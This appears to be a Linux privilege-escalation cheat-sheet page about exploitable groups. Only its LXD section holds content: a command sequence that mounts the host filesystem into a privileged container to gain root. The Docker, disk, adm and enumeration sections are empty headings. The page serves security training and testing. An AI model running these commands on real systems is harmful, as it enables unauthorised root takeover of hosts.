πPrivileged Groups
π― Overview
Certain Linux groups provide elevated privileges that can be exploited for privilege escalation through container access, disk manipulation, or administrative file access.
π³ High-Risk Groups
LXD Group
Impact: Container root = host root
# Check membership
id | grep lxd
# Create privileged container
lxd init # Use defaults
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh
# Access host filesystem as root
cd /mnt/root/rootDocker Group
Impact: Host filesystem access via containers
Disk Group
Impact: Raw device access
ADM Group
Impact: Log file access
π Quick Exploitation
LXD Privilege Escalation
Docker Escalation
Other Dangerous Groups
π Group Enumeration
Check All User Groups
Privileged Group Detection Script
π Quick Reference
Immediate Checks
Emergency Escalation
Privileged group membership often provides immediate privilege escalation paths - container access, disk manipulation, and administrative file access can lead directly to root privileges.
Last updated